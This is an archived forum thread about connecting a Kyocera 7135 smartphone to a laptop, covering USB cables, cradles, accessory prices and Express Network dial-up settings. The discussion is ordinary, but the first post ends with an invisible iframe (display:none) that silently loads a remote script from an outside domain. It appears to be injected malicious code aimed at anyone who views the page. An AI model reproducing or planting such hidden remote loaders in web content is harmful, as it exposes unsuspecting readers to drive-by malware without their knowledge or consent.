+ Reply to Thread

7135 cables to computer

I am expecting to get my long-await 7135 Tuesday from Verizon store. I would like to connect it to my laptop while traveling. I know, reading this forum, that it can be done, but I don't want to carry the cradle to do it. Does anyone know of a third-party USB cable that will work?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Kyocera makes a "true" USB cable that plugs into the phone's data port. I think its like $30 or $40. I got mine right away when I got the phone and I love it. I've used it for both HotSyncing and for data connections on my iBook. I don't know of any third party cables however.
    Sorry, but I no longer make 7135 headset adapters.

My 7135 came with a USB/Serial cradle. It was the Alltel version. I don't know if the VZW will. You can use the cable with either the serial or USB port. The only bad thing I've found about the cradle is that you can't use it with the accessory keyboard. It would be nice if an adapter could be made. Think it is possible, coolcat?

Re: 7135 cables to computer

Originally posted by MGBarnette
    I am expecting to get my long-await 7135 Tuesday from Verizon store. I would like to connect it to my laptop while traveling. I know, reading this forum, that it can be done, but I don't want to carry the cradle to do it. Does anyone know of a third-party USB cable that will work?

I Ordered Mine today from Verizon and was told that I will have it on Wed. Also called Dan at Danscellphones and ordered the True USB Data Cable for $21.99 compared to Kyocera & Verizon for $39.99 plus other accessories for the 7135 and SAVED $83 :jump

AJR
    Got all my accessories on order from Dan as well, including the USB data cable. I even called him to ask if I could add a battery to my order and get it shipped with the other things I got. Hopefully they went out today... I'm expecting the actual phone tomorrow or Wednesday.

I'm also looking for a good price on the Lexar 256MB SD card. eCost has it for $65 with free shipping, but they charge a $6 handling fee, and tax (I'm in CA). Excessive handling charges piss me off! I'd rather pay $4 for shipping charges rather than free shipping and $6 handling!

I want the Lexar instead of SanDisk based on all I've been reading about transfer speeds. I'm willing to spend more on the Lexar, but not willing to spend more for the same item (the Lexar 256MB SD ranges from $65 to $110 online... that's a big difference). When you add tax and shipping into the mix, the least expensive option can become the most expensive!

I'm also going to order the USB cable from Dan soon... $21.99 shipped is a great deal
    Please visit my picture site: Robert-O-Rama :)

How do you get the phone to communicate via the Express Net to the laptop PC for surfing the net on the PC? I am currently using the standard docking station USB connection.

Originally posted by PhilippZ
    How do you get the phone to communicate via the Express Net to the laptop PC for surfing the net on the PC? I am currently using the standard docking station USB connection.

One of the manuals on your CD is the "modem setup guide.pdf". It contains instructions for setting up the Kyo as a modem.

Then to use express network, set up a dial up connection using your_mobile_number@vzw3g.com as your user name (replacing "your_mobile_number with your mobile telephone number), vzw as the password, and #777 as the digits to dial.

And remember, this boards search function is your friend....

Alan

Data Cables?

I have some questions...

1) I have a serial data cable for the 6035. The connector fits fine. There is a power socket on this cable that fits the power adapters for the 6025. Will this power the 7035 through this cable?

2) Can I use the USB and or the serial data cables to HOT SYNC the 7035? Do the 7035 versions have a power socket?

3) Are there Macintosh drivers for the USB cable?

4) Where can the dual serial/usb data cable shipped with the Alltel phone be purchased?

Re: Data Cables?

Originally posted by smartphone fan
    I have some questions...

1) I have a serial data cable for the 6035. The connector fits fine. There is a power socket on this cable that fits the power adapters for the 6025. Will this power the 7035 through this cable?

2) Can I use the USB and or the serial data cables to HOT SYNC the 7035? Do the 7035 versions have a power socket?

3) Are there Macintosh drivers for the USB cable?

4) Where can the dual serial/usb data cable shipped with the Alltel phone be purchased?
    I can't answer #1, I don't know.

2: Yes, and yes.

3: Same ones that drive the usb/serial cradle.

4: The Hotsync cradle has both serial and usb connectors. No other cable comes with the Alltel phones.

Alan

Re: Re: Data Cables?

Originally posted by alanb
    I can't answer #1, I don't know.

2: Yes, and yes.

3: Same ones that drive the usb/serial cradle.

4: The Hotsync cradle has both serial and usb connectors. No other cable comes with the Alltel phones.

Alan
    The post with the usb/serial cable must have been a mispirnt. The poster must have meant cradle.

Thank you.